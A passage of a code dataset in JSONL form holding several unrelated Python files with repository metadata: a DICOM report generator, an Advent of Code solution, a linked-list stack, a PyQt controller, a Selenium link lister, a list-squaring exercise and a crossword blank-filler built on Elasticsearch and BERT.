{}\".format(k, v), align=\"L\")\n pdf.cell(w=0, h=9, ln=1, txt=\"Total objects found: {}\".format(sum(count.values())), align=\"L\")\n\n def _write_object_features(self, pdf, length_unit):\n x = pdf.get_x()\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Object Features ({})\".format(length_unit), align=\"L\")\n pdf.set_font_size(12)\n pdf.set_draw_color(0)\n pdf.write_html(self._repr_object_features(length_unit))\n pdf.set_font(\"Arial\")\n pdf.set_x(x)\n\n def _count_found_objects(self, object_type=None):\n if object_type:\n types = [found_object[\"type\"] for found_object in self.found_objects.values()]\n return types.count(object_type)\n else:\n return sum([g.number_of_nodes() for g in self.networkx_graphs])\n\n def _get_found_object_types(self):\n return set(found_object[\"type\"] for found_object in self.found_objects.values())\n\n def _repr_object_features(self, length_unit):\n length_ratio = self.mm_per_px if length_unit == \"mm\" else 1\n return \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n {}\n \n
    TypeLength [{}]Min width [{}]Max width [{}]Max angle [°]
    \n \"\"\".format(length_unit, length_unit, length_unit, \"\\n\".join(\n self._repr_found_object(number, found_object, length_ratio) for number, found_object in\n self.found_objects.items()))\n\n @staticmethod\n def _repr_found_object(number, found_object, length_ratio):\n return \"\"\"\n \n {}\n {}\n {}\n {}\n {}\n {}\n \n \"\"\".format(\n \"#FFFFFF\" if number % 2 == 0 else \"#F0FFF0\",\n number,\n found_object[\"type\"],\n round(found_object[\"length\"] * length_ratio, 1),\n round(found_object[\"min_width\"] * length_ratio, 2),\n round(found_object[\"max_width\"] * length_ratio, 2),\n round(found_object[\"max_angle\"], 1),\n )\n\n def to_pdf(self, filename=None):\n pdf = ReportGenerator.PDFReport()\n self._generate_pdf_report(pdf)\n return pdf.output(dest=\"S\").encode(\"latin-1\") if filename is None else pdf.output(name=filename, dest=\"F\")\n\n def _generate_xlsx_report(self, xlsx):\n formats = {\n \"bold\": xlsx.add_format({\"bold\": True}),\n \"round1\": xlsx.add_format({\"num_format\": \"0.0\"}),\n \"round2\": xlsx.add_format({\"num_format\": \"0.00\"})\n }\n\n start_row = 0\n start_col = 0\n\n info = xlsx.add_worksheet(\"Info\")\n self._write_table(info, start_row - 1, start_col, [], self.info_items, None)\n\n object_count = xlsx.add_worksheet(\"Object Count\")\n count = {object_type: self._count_found_objects(object_type) for object_type in self._get_found_object_types()}\n data_row = self._write_table(\n object_count, start_row, start_col, (\"Type\", \"Count\"), count.items(), formats[\"bold\"]\n )\n number_range = xlsxwriter.utility.xl_range(start_row + 1, start_col + 1, data_row - 1, start_col + 1)\n object_count.write_string(data_row, start_col, \"Total\", formats[\"bold\"])\n object_count.write_formula(data_row, start_col + 1, \"=SUM({})\".format(number_range), value=sum(count.values()))\n\n original_image = xlsx.add_worksheet(\"Original Image\")\n original_image.insert_image(start_row, start_col, self.original_image_filepath)\n\n color_per_type = xlsx.add_worksheet(\"Objects by Type\")\n color_per_type.insert_image(start_row, start_col, self.color_per_type_filepath)\n\n object_numbers = xlsx.add_worksheet(\"Objects by Number\")\n object_numbers.insert_image(start_row, start_col, self.object_numbers_filename)\n\n object_features_columns = (\"Number\", \"Type\", \"Length [{}]\", \"Min width [{}]\", \"Max width [{}]\", \"Max angle [°]\")\n object_features_name = \"Object Features ({})\"\n object_features_column_formats = (\n None, None, formats[\"round1\"], formats[\"round2\"], formats[\"round2\"], formats[\"round1\"]\n )\n\n def _get_object_features(length_ratio):\n return ((number,\n found_object[\"type\"],\n found_object[\"length\"] * length_ratio,\n found_object[\"min_width\"] * length_ratio,\n found_object[\"max_width\"] * length_ratio,\n found_object[\"max_angle\"]) for number, found_object in self.found_objects.items())\n\n object_features_px = xlsx.add_worksheet(object_features_name.format(\"px\"))\n self._write_table(object_features_px, start_row, start_col,\n (column.format(\"px\") for column in object_features_columns),\n _get_object_features(1), formats[\"bold\"], object_features_column_formats)\n\n object_size_ratio = xlsx.add_worksheet(\"Object Size Ratio\")\n object_size_ratio.write_string(start_row, start_col, \"1 mm per px\", formats[\"bold\"])\n object_size_ratio.write(\n start_row + 1, start_col, self.mm_per_px if self.mm_per_px is not None else \"(Not available)\"\n )\n\n if self.mm_per_px is None:\n return\n\n object_features_mm = 
xlsx.add_worksheet(object_features_name.format(\"mm\"))\n self._write_table(object_features_mm, start_row, start_col,\n (column.format(\"mm\") for column in object_features_columns),\n _get_object_features(self.mm_per_px), formats[\"bold\"], object_features_column_formats)\n\n @staticmethod\n def _write_table(worksheet, start_row, start_col, column_names, table_values, column_names_format,\n column_formats=None):\n for col, column_name in enumerate(column_names):\n worksheet.write_string(start_row, start_col + col, column_name, column_names_format)\n data_row = start_row + 1\n for row_values in table_values:\n for col, cell in enumerate(row_values):\n worksheet.write(\n data_row, start_col + col, cell, None if column_formats is None else column_formats[col]\n )\n data_row += 1\n return data_row\n\n def to_xlsx(self, filename=None):\n output = BytesIO() if filename is None else filename\n xlsx = xlsxwriter.Workbook(output)\n self._generate_xlsx_report(xlsx)\n xlsx.close()\n if filename is None:\n output.seek(0)\n return output.read()\n","repo_name":"jstarzyk/dicom-parser","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39950648292","text":"import numpy as np\n\n\ndata = np.loadtxt(\"input\", dtype=int, delimiter=\",\")\ndata = np.array([16,1,2,0,4,2,7,1,2,14])\n\n# Part 1\nprint(int(np.sum(np.abs(data - np.round(np.median(data))))))\n\n\n# Part 2 (Smart)\nprint(np.mean(data) + 0.5)\nx = np.abs(data - np.round(np.mean(data) + 0.5))\nprint(int(np.sum(x * (x+1) / 2)))\n\n# Part 2 (Brute)\nmin_cost = None\nmin_i = None\nfor i in range(np.min(data), np.max(data)):\n x = np.abs(data - i)\n cost = np.sum(x * (x+1) / 2)\n # print(i, cost)\n if min_cost is None or cost < min_cost:\n min_cost = cost\n min_i = i\n \nprint(min_i, int(min_cost))\n \n \n","repo_name":"theevann/advent-of-code","sub_path":"2021/day_7/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5903506672","text":"class Element(object):\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList(object):\n def __init__(self, head=None):\n self.head = head\n\n def insert_first(self, new_element):\n new_element.next = self.head\n self.head = new_element\n\n def delete_first(self):\n if self.head:\n deleted_element = self.head\n temp = deleted_element.next\n self.head = temp\n return deleted_element\n else:\n return None\n\n\nclass Stack(object):\n def __init__(self, top=None):\n self.ll = LinkedList(top)\n\n def push(self, new_element):\n self.ll.insert_first(new_element)\n\n def pop(self):\n return self.ll.delete_first()\n\n\nstack = Stack()\nsequence = \"123456789\"\n\nfor ch in sequence:\n stack.push(Element(ch))\n print(ch,end=\"\")\nprint()\n\ne = stack.pop()\nwhile e:\n print(e.value, end=\"\")\n e = stack.pop()\n","repo_name":"KomissarovSV/Algorithms","sub_path":"Stack/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19373270020","text":"from __future__ import annotations\nimport logging\n\nfrom PyQt5.QtCore import QItemSelection\nfrom PyQt5.QtWidgets import QAbstractItemView\n\nfrom ...api.observer import Observable, Observer\nfrom ...model import DetectorPresenter\nfrom ...model.data 
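# A quick check of the closed form used in the Advent of Code day 7 solution
# above: moving a distance x costs the triangular number x*(x+1)/2, and the
# optimum target sits within 0.5 of the mean, which is why np.mean(data) + 0.5
# is probed. On the sample input the best target is 5 and the total cost is 168:
import numpy as np

d = np.abs(np.array([16, 1, 2, 0, 4, 2, 7, 1, 2, 14]) - 5)
print(int(np.sum(d * (d + 1) / 2)))  # 168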
import DiffractionDatasetPresenter\nfrom ...model.image import ImagePresenter\nfrom ...model.probe import ApparatusPresenter\nfrom ...view.detector import DetectorView\nfrom ...view.image import ImageView\nfrom ..data import FileDialogFactory\nfrom ..image import ImageController\nfrom .parameters import DetectorParametersController\nfrom .treeModel import DatasetTreeModel, DatasetTreeNode\n\nlogger = logging.getLogger(__name__)\n\n\nclass DetectorController(Observer):\n\n def __init__(self, detectorPresenter: DetectorPresenter,\n apparatusPresenter: ApparatusPresenter,\n datasetPresenter: DiffractionDatasetPresenter, imagePresenter: ImagePresenter,\n view: DetectorView, imageView: ImageView,\n fileDialogFactory: FileDialogFactory) -> None:\n super().__init__()\n self._datasetPresenter = datasetPresenter\n self._imagePresenter = imagePresenter\n self._view = view\n self._imageView = imageView\n self._imageController = ImageController.createInstance(imagePresenter, imageView,\n fileDialogFactory)\n self._parametersController = DetectorParametersController.createInstance(\n detectorPresenter, apparatusPresenter, view.parametersView)\n self._treeModel = DatasetTreeModel()\n\n @classmethod\n def createInstance(cls, detectorPresenter: DetectorPresenter,\n apparatusPresenter: ApparatusPresenter,\n datasetPresenter: DiffractionDatasetPresenter,\n imagePresenter: ImagePresenter, view: DetectorView, imageView: ImageView,\n fileDialogFactory: FileDialogFactory) -> DetectorController:\n controller = cls(detectorPresenter, apparatusPresenter, datasetPresenter, imagePresenter,\n view, imageView, fileDialogFactory)\n\n view.dataView.treeView.setModel(controller._treeModel)\n view.dataView.treeView.setSelectionBehavior(QAbstractItemView.SelectRows)\n view.dataView.treeView.selectionModel().selectionChanged.connect(controller._updateView)\n datasetPresenter.addObserver(controller)\n\n controller._syncModelToView()\n\n return controller\n\n def _updateView(self, selected: QItemSelection, deselected: QItemSelection) -> None:\n for index in deselected.indexes():\n self._imagePresenter.clearArray()\n break\n\n for index in selected.indexes():\n node = index.internalPointer()\n self._imagePresenter.setArray(node.data)\n break\n\n def _syncModelToView(self) -> None:\n rootNode = DatasetTreeNode.createRoot()\n\n for arrayPresenter in self._datasetPresenter:\n rootNode.createChild(arrayPresenter)\n\n self._treeModel.setRootNode(rootNode)\n\n infoText = self._datasetPresenter.getInfoText()\n self._view.dataView.infoLabel.setText(infoText)\n\n def update(self, observable: Observable) -> None:\n if observable is self._datasetPresenter:\n self._syncModelToView()\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/controller/detector/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36731466195","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\ndriver=webdriver.Chrome(r'C:\\Users\\silpa\\PycharmProjects\\chromedriver_win32\\chromedriver')\n\ndriver.get(\"https://www.expedia.co.in/\")\ndriver.maximize_window()\n\ntime.sleep(3)\nlinks=driver.find_elements(By.CLASS_NAME,\"uitk-link uitk-link-layout-inline uitk-type-200\")\nprint(\"Total number of Links present is: \",len(links)) #number of links present\n\nfor link in links:\n print(link.text) #Print all the link names\n\n#clicking the 
link\n\ndriver.find_element_by_link_text(\"Support\").click()\n#or\n#driver.find_element_by_partial_link_text(\"Supp\").click()\n\ntime.sleep(2)\ndriver.close()\n\n","repo_name":"silpa-priyadarshini/SELENIUM-_PYTHON","sub_path":"sessions/Links.py","file_name":"Links.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37331123600","text":"#Write a function that receives a sample of numbers in a list and returns another list with their squares.\n\ndef cuadrados(lista):\n cuadrados=[]\n\n for i in range(len(lista)):\n cuadrados.append(lista[i]** 2)\n return cuadrados\n\n\nlista = [3,4,2,1,24,7,9,20]\nprint(f'The list of integers is: {lista}')\nprint(f'The squares of the numbers are: {cuadrados(lista)}')","repo_name":"ecelis1/programacion2","sub_path":"Actividades/Laboratorio2/GuiaN1/e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"75056057651","text":"\nimport numpy as np, os, time, json\nfrom os.path import join, exists\nfrom collections import defaultdict\nfrom elasticsearch import Elasticsearch, helpers\nfrom bert4keras.models import build_transformer_model\nfrom bert4keras.tokenizers import Tokenizer\nfrom bert4keras.snippets import to_array\nfrom .utils import BaseObject\nfrom .puz_utils import tokenize, string2fill, blank as blank_str\n\nclass BlankFiller(BaseObject):\n\t@property\n\tdef options(self): return dict(super().options, **{\n\t\t\"dbname\": \"wiki_titles\",\n\t\t\"src_file_path\": \"/mnt/clh25/wikidata/outputs/wikititles.txt\",\n\t\t\"es_host\": '10.176.64.111:9200',\n\t\t\"new\": False,\n\t\t\"doc_limit\": 20,\n\t\t\"idf_path\": \"data/idf_wikititle.txt\",\n\t})\n\t@property\n\tdef bert_path(self): return \"../bert/wwm_uncased_L-24_H-1024_A-16\"\n\t@property\n\tdef blank(self): return blank_str\n\t@property\n\tdef initializations(self): \n\t\treturn super().initializations + [\n\t\t\tself.init_bert,\n\t\t\tself.init_es,\n\t\t]\n\tdef init_es(self, args, **kwargs):\n\t\tself.es = Elasticsearch(self.es_host)\n\t\tif not self.es.indices.exists(self.dbname) or self.new:\n\t\t\tprint(\"index doesn't exist, creating one\")\n\t\t\tmapping = {\n\t\t\t\t'properties': {\n\t\t\t\t\t'title': {\n\t\t\t\t\t\t'type': 'text',\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint(\"Clearing the old db...\")\n\t\t\tprint(self.es.indices.delete(index=self.dbname, ignore=[400, 404]))\n\t\t\tprint(\"Creating the new db...\")\n\t\t\tprint(self.es.indices.create(index=self.dbname, ignore=400))\n\t\t\tprint(\"Specifying the index...\")\n\t\t\tresult = self.es.indices.put_mapping(index=self.dbname, body=mapping)\n\t\t\tprint(result)\n\n\t\t\tdef data_gen(dirn):\n\t\t\t\tcnt = 0\n\t\t\t\tt0 = time.time()\n\t\t\t\twith open(dirn, encoding=\"utf-8\") as fin:\n\t\t\t\t\tfin.readline()\n\t\t\t\t\tfor line in fin:\n\t\t\t\t\t\t_id, remains = line.strip(\"\\r\\n\").split(\"\\t\", 1)\n\t\t\t\t\t\tfor item in remains.split(\"\\t\"):\n\t\t\t\t\t\t\twikipedia_id, remain = item.split(\",\", 1)\n\t\t\t\t\t\t\ttitle, source = remain.rsplit(\",\", 1)\n\t\t\t\t\t\t\tyield {\"_index\": self.dbname, \"_id\": _id, \"_source\": {\n\t\t\t\t\t\t\t\t\"redirect\": int(source), \n\t\t\t\t\t\t\t\t\"title\": title.replace(\"_\", \" \"), \n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\tcnt += 1\n\t\t\t\t\t\tif cnt % 10000 == 0: print(\"%7d\\t%.2f\"%(cnt, time.time()-t0))\n\t\t\t\tprint(\"%7d\\t%.2f\"%(cnt, 
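# The cuadrados() exercise above, rewritten as an equivalent list comprehension:
def squares(numbers):
    return [n ** 2 for n in numbers]

print(squares([3, 4, 2, 1, 24, 7, 9, 20]))  # [9, 16, 4, 1, 576, 49, 81, 400]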
time.time()-t0))\n\t\t\thelpers.bulk(self.es, (item for item in data_gen(self.src_file_path)), request_timeout=100)\n\tdef init_bert(self, args, **kwargs):\n\t\tconfig_path = join(self.bert_path, 'bert_config.json')\n\t\tcheckpoint_path = join(self.bert_path, 'bert_model.ckpt')\n\t\tdict_path = join(self.bert_path, 'vocab.txt')\n\t\t\n\t\tself.model = build_transformer_model(\n\t\t\tconfig_path=config_path, checkpoint_path=checkpoint_path, with_mlm=True\n\t\t) # 建立模型,加载权重\n\t\tself.tokenizer = Tokenizer(dict_path, do_lower_case=\"uncased\" in self.bert_path) # 建立分词器\n\n\t\ttoken_ids, _ = self.tokenizer.encode(self.blank)\n\t\tself.blank_tokens = token_ids[1:-1]\n\tdef find_blank(self, token_ids): # TODO: KMP (unnecessary)\n\t\ti = 0\n\t\tN = len(self.blank_tokens)\n\t\twhile i < len(token_ids)-N+1:\n\t\t\tmatch = True\n\t\t\tfor j in range(N):\n\t\t\t\tif token_ids[i+j] != self.blank_tokens[j]: \n\t\t\t\t\tmatch = False\n\t\t\t\t\tbreak\n\t\t\tif match: return (i, i+N)\n\t\t\ti += 1\n\t\treturn -1, -1\n\tdef fill_by_bert(self, clue, length, limit=10, max_masked_words=1, blacklist={\"AND\", \"FOR\", \"THE\"}):\n\t\tret = getattr(self, \"bert_buf\", {}).get(clue)\n\t\tif ret is not None: return ret\n\n\t\tif self.blank in clue:\n\t\t\ttoken_ids, segment_ids = self.tokenizer.encode(clue)\n\t\telse:\n\t\t\ttoken_ids, segment_ids = self.tokenizer.encode(clue, self.blank)\n\t\t\n\t\ttokens, segments, mlens = [], [], []\n\t\ts, t = self.find_blank(token_ids)\n\t\tif t < 0: return []\n\t\tfor i in range(1, max_masked_words+1):\n\t\t\ttokens.append(token_ids[:s] + [self.tokenizer._token_dict[\"[MASK]\"]] * i \\\n\t\t\t\t+ token_ids[t:] + [self.tokenizer._token_dict[\"[PAD]\"]] * (max_masked_words-i))\n\t\t\tsegments.append(segment_ids[:s] + segment_ids[s:s+1] * i + segment_ids[t:]\n\t\t\t\t+ segment_ids[-1:] * (max_masked_words-i))\n\t\t\tmlens.append(i)\n\t\t# for token_ids in tokens:\n\t\t# \tprint(self.tokenizer.ids_to_tokens(token_ids))\t\n\t\tprobas = self.model.predict([tokens, segments])\n\t\tpreds = (-probas).argsort(axis=-1)\n\t\t\n\t\twords = {}\n\t\tfor i in range(max_masked_words):\n\t\t\tfor w in preds[i][s+1]:\n\t\t\t\twd = self.tokenizer.id_to_token(w)\n\t\t\t\tfillstring = string2fill(wd)\n\t\t\t\tif len(fillstring) == length and fillstring not in blacklist:\n\t\t\t\t\twords[fillstring] = words.get(fillstring, 0) + float(probas[i][s+1][w])\n\t\t\t\t\tif len(words) >= limit: break\n\t\t\tif len(words) >= limit: break\n\t\tret = [(w, s, \"BERT\") for w, s in words.items()]\n\t\tret.sort(key=lambda x:-x[1])\n\t\tif hasattr(self, \"bert_buf\"): self.bert_buf[clue] = ret\n\t\treturn ret\n\tdef retrieve(self, query, ifrom=0, limit=None):\n\t\tif limit is None: limit = self.doc_limit\n\t\tkey = \"%s: %d\"%(query, ifrom)\n\t\tret = getattr(self, \"wiki_buf\", {}).get(key)\n\t\tif ret is not None: return ret\n\n\t\tresults = self.es.search(index=self.dbname, body={\n\t\t\t\"query\": {\"bool\": {\n\t\t\t\t\"must\": [\n\t\t\t\t\t{\"match\": {\"title\": query}}\n\t\t\t\t],\n\t\t\t\t\"filter\": [\n\t\t\t\t]\n\t\t\t\t# \"must_not\": {\"term\": {\"lengths\": 10}}\n\t\t\t}},\n\t\t\t\"from\": ifrom,\n\t\t\t\"size\": limit,\n\t\t}, request_timeout=100)\n\t\tret = results[\"hits\"][\"hits\"]\n\t\tret.sort(key=lambda x:(-x[\"_score\"], x[\"_source\"][\"redirect\"]))\n\t\tif hasattr(self, \"wiki_buf\"): self.wiki_buf[key] = ret\n\t\treturn ret\n\tdef fill_by_wiki(self, clue, length, limit=10, blacklist=set()):\n\t\tif self.blank not in clue: return []\n\t\t\n\t\ttokens = tokenize(clue)\n\t\texs = 
blacklist | {string2fill(t) for t in tokens}\n\t\tif self.blank not in tokens: return []\n\t\tbid = tokens.index(self.blank)\n\t\tpre = tokens[bid-1] if bid > 0 else None\n\t\tpost = tokens[bid+1] if bid+1 < len(tokens) else None\n\t\t\n\t\tret = []\n\t\tcnt = 0\n\t\twhile len(ret) < limit and cnt < limit*10:\n\t\t\titems = self.retrieve(clue.replace(self.blank, \"\"), ifrom=cnt)\n\t\t\tfor item in items:\n\t\t\t\ttts = tokenize(item[\"_source\"][\"title\"])\n\t\t\t\tcands = []\n\t\t\t\tfor i in range(len(tts)):\n\t\t\t\t\tfs = string2fill(tts[i])\n\t\t\t\t\tif len(fs) == length and fs not in exs:\n\t\t\t\t\t\t# if (i == 0 or pre == tts[i-1]) and (i+1 == len(tts) or post == tts[i+1]):\n\t\t\t\t\t\t# \tret.append((fs, item[\"_score\"], item[\"_source\"][\"title\"]))\n\t\t\t\t\t\tscore = item[\"_score\"]\n\t\t\t\t\t\tif i > 0 and pre == tts[i-1]: score *= 2\n\t\t\t\t\t\tif i+1 < len(tts) and post == tts[i+1]: score *= 2\n\t\t\t\t\t\tcands.append((fs, score))\n\t\t\t\tif cands:\n\t\t\t\t\tcands.sort(key=lambda x:-x[1])\n\t\t\t\t\tif cands[0][1] > cands[-1][1]:\n\t\t\t\t\t\tcands = cands[:1]\n\t\t\t\t\tfor f, s in cands:\n\t\t\t\t\t\tret.append((f, s, item[\"_source\"][\"title\"]))\n\t\t\t\t\t\texs.add(f)\n\t\t\tcnt += len(items)\n\t\t\tif not items: break\n\t\treturn ret[:limit]\n\tdef generate(self, clue, length, limit=10, blacklist=set()):\n\t\tret = self.fill_by_wiki(clue, length, limit=limit, blacklist=blacklist)\n\t\t# if len(ret) < limit:\n\t\t# \tret += self.fill_by_bert(clue, length, limit-len(ret))\n\t\treturn ret\nclass BlankFillerProb(BlankFiller):\n\t@property\n\tdef params(self): return dict(super().params, **{\n\t\t\"smooth\": 0.1,\n\t\t\"eta\": 0.04\n\t})\n\t@property\n\tdef initializations(self): \n\t\treturn super().initializations + [\n\t\t\tself.init_idf,\n\t\t\tself.init_buf,\n\t\t]\n\tdef init_idf(self, args, **kwargs):\n\t\tself.idf = {}\n\t\twith open(self.idf_path, encoding=\"utf-8\") as fin:\n\t\t\tfor line in fin:\n\t\t\t\tword, f = line.strip().split(\"\\t\")\n\t\t\t\tself.idf[word] = float(f)\n\tdef init_buf(self, args, buf_dir=\"outputs/fillblanks\", **kwargs): \n\t\tbert_buf_file = join(buf_dir, \"bert_buf.json\")\n\t\tif exists(bert_buf_file):\n\t\t\twith open(bert_buf_file, encoding=\"utf-8\") as fin:\n\t\t\t\tself.bert_buf = json.load(fin)\n\t\telse: self.bert_buf = {}\n\t\twiki_buf_file = join(buf_dir, \"wiki_buf.json\")\n\t\tif exists(wiki_buf_file):\n\t\t\twith open(wiki_buf_file, encoding=\"utf-8\") as fin:\n\t\t\t\tself.wiki_buf = json.load(fin)\n\t\telse: self.wiki_buf = {}\n\tdef save_buf(self, buf_dir=\"outputs/fillblanks\"):\n\t\twith open(join(buf_dir, \"bert_buf.json\"), \"w\", encoding=\"utf-8\") as fout:\n\t\t\tjson.dump(self.bert_buf, fout)\n\t\twith open(join(buf_dir, \"wiki_buf.json\"), \"w\", encoding=\"utf-8\") as fout:\n\t\t\tjson.dump(self.wiki_buf, fout)\n\tdef fill_by_wiki(self, clue, length, limit=10, blacklist=set()):\n\t\ttokens = tokenize(clue)\n\t\texs = blacklist | {string2fill(t) for t in tokens}\n\t\ttry: bid = tokens.index(self.blank)\n\t\texcept Exception:\n\t\t\tprint(clue, tokens)\n\t\t\treturn []\n\t\tpre = tokens[bid-1] if bid > 0 else None\n\t\tpost = tokens[bid+1] if bid+1 < len(tokens) else None\n\t\tdenom = int(pre is not None) + int(post is not None)\n\t\tmaxs = sum([self.idf.get(t, self.idf[\"MAX\"]) for t in tokens if t != self.blank])\n\t\t\n\t\tret = []\n\t\tcnt = 0\n\t\twhile len(ret) < limit and cnt < limit*10:\n\t\t\titems = self.retrieve(clue.replace(self.blank, \"\"), ifrom=cnt)\n\t\t\tfor item in 
items:\n\t\t\t\ttts = tokenize(item[\"_source\"][\"title\"])\n\t\t\t\tcands = []\n\t\t\t\tfor i in range(len(tts)):\n\t\t\t\t\tfs = string2fill(tts[i])\n\t\t\t\t\tif len(fs) == length and fs not in exs:\n\t\t\t\t\t\t# if (i == 0 or pre == tts[i-1]) and (i+1 == len(tts) or post == tts[i+1]):\n\t\t\t\t\t\t# \tret.append((fs, item[\"_score\"], item[\"_source\"][\"title\"]))\n\t\t\t\t\t\tscore = item[\"_score\"]\n\t\t\t\t\t\tif score > maxs: maxs = score\n\t\t\t\t\t\tprob = score / maxs * (\n\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\tint(i > 0 and pre == tts[i-1]) + \n\t\t\t\t\t\t\t\tint(i+1 < len(tts) and post == tts[i+1])\n\t\t\t\t\t\t\t) / denom * (1-self.smooth) + self.smooth\n\t\t\t\t\t\t)\n\t\t\t\t\t\tcands.append((fs, prob))\n\t\t\t\t#print(item[\"_source\"], tts, cands)\n\t\t\t\tif cands:\n\t\t\t\t\tcands.sort(key=lambda x:-x[1])\n\t\t\t\t\tif cands[0][1] > cands[-1][1]:\n\t\t\t\t\t\tcands = cands[:1]\n\t\t\t\t\tfor f, s in cands:\n\t\t\t\t\t\tret.append((f, s, item[\"_source\"][\"title\"]))\n\t\t\t\t\t\texs.add(f)\n\t\t\tcnt += len(items)\n\t\t\tif not items: break\n\t\tret.sort(key=lambda x:-x[1])\n\t\treturn ret[:limit]\n\tdef generate(self, clue, length, limit=10, blacklist=set(), eta=None):\n\t\tif self.blank not in clue: return []\n\t\tif eta is None: eta = self.eta\n\t\tcands = defaultdict(float)\n\t\twiki_res = self.fill_by_wiki(clue, length, limit=limit, blacklist=blacklist)\n\t\tss_wiki = sum([s for w, s, c in wiki_res])\n\t\tfor w, s, c in wiki_res:\n\t\t\tcands[w] = s/ss_wiki * (1-eta)\n\t\tif eta:\n\t\t\tbert_res = self.fill_by_bert(clue, length, limit)\n\t\t\tss_bert = sum([s for w, s, c in bert_res])\n\t\t\tfor w, s, c in bert_res:\n\t\t\t\tcands[w] += s/ss_bert * eta\n\t\t\n\t\treturn [(w, s, \"FB\") for w, s in sorted(cands.items(), key=lambda x:-x[1])[:limit]]\n\ndef test_fill(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_test.txt\"):\n\tif not exists(odir): os.makedirs(odir)\n\tbf = BlankFillerProb()\n\tt = n = 0\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"wiki_fill_res.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\tdate, clue, ans = line.strip(\"\\r\\n\").split(\"\\t\")\n\t\t\tindex, clue = clue.split(\".\", 1)\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tret = bf.generate(clue, len(ans))\n\t\t\t\trank = -1\n\t\t\t\tfor i, (w, s, _) in enumerate(ret):\n\t\t\t\t\tif ans == w:\n\t\t\t\t\t\trank = i+1\n\t\t\t\t\t\tbreak\n\t\t\t\tt += rank > 0\n\t\t\t\tfout.write(\"%s\\t%s. 
%s\\t%s\\t%+d\\n\"%(date, index, clue, ans, rank))\n\t\t\t\tfor w, s, _ in ret:\n\t\t\t\t\tfout.write(\"\\t%s\\t%.4e\\n\"%(w, s))\n\tprint(\"accuracy=%d/%d=%.4f\"%(t, n, t/n))\ndef get_rank(res, ans):\n\trank = 999999\n\tfor i in range(len(res)):\n\t\tk, v, _ = res[i]\n\t\tif k.lower() == ans.lower(): \n\t\t\trank = i\n\t\t\tbreak\n\tif rank >= len(res): return rank+1\n\n\tans, score, _ = res[rank]\n\trank = 0\n\tfor k, v, _ in res:\n\t\tif v >= score: rank += 1\n\t\telse: break\n\treturn rank\ndef debug_fill(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_for_test.txt\"):\n\tif not exists(odir): os.makedirs(odir)\n\tbf = BlankFillerProb(smooth=0.01)\n\tt = n = n1 = n2 = 0\n\trr1 = rr2 = 0.\n\tm1name, m2name = \"WK\", \"SM\"\n\n\t# def load_buf(fn):\n\t# \tBFbuf = {}\n\t# \twith open(fn, encoding=\"utf-8\") as fin:\n\t# \t\tfor line in fin:\n\t# \t\t\titem = json.loads(line)\n\t# \t\t\tBFbuf[item[\"clue\"]] = item[\"res\"]\n\t# \treturn BFbuf\n\t# WKbuf = load_buf(\"outputs/candgen_mix/BF_WK.json\")\n\t# SMbuf = load_buf(\"outputs/candgen_mix/BF_SM.json\")\n\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"debug_res_WK-SM.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\titem = json.loads(line.strip())\n\t\t\tclue, ans = item[\"clue\"], item[\"answer\"]\n\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tm1_res = bf.generate(clue, len(ans), limit=limit, eta=0)#WKbuf.get(clue, [])#bf.fill_by_wiki(clue, len(ans), limit=limit)\n\t\t\t\tm2_res = bf.generate(clue, len(ans), limit=limit, eta=0.04)#SMbuf.get(clue, [])#bf.fill_by_bert(clue, len(ans), limit=limit)#super(BlankFillerProb, bf).fill_by_wiki(clue, len(ans), limit=limit)\n\t\t\t\tm1_rank = get_rank(m1_res, ans)\n\t\t\t\tm2_rank = get_rank(m2_res, ans)\n\t\t\t\trr1 += 1/m1_rank\n\t\t\t\trr2 += 1/m2_rank\n\t\t\t\tif m1_rank != m2_rank:\n\t\t\t\t\tif m1_rank < m2_rank:\n\t\t\t\t\t\tfout.write(\"%s better\\n\"%m1name)\n\t\t\t\t\t\tn1 += 1\n\t\t\t\t\telse: \n\t\t\t\t\t\tfout.write(\"%s better\\n\"%m2name)\n\t\t\t\t\t\tn2 += 1\n\t\t\t\t\tfout.write(\"%s\\t%s\\t%+d\\t%+d\\n\"%(clue, ans, m1_rank, m2_rank))\t\n\t\t\t\t\tfor i in range(max(len(m1_res), len(m2_res))):\n\t\t\t\t\t\tr1, s1 = (m1_res[i][0], m1_res[i][1]) if i < len(m1_res) else (\"\", 0)\n\t\t\t\t\t\tr2, s2 = (m2_res[i][0], m2_res[i][1]) if i < len(m2_res) else (\"\", 0)\n\t\t\t\t\t\tfout.write(\"%s: %.4e\\t%s: %.4e\\n\"%(r1, 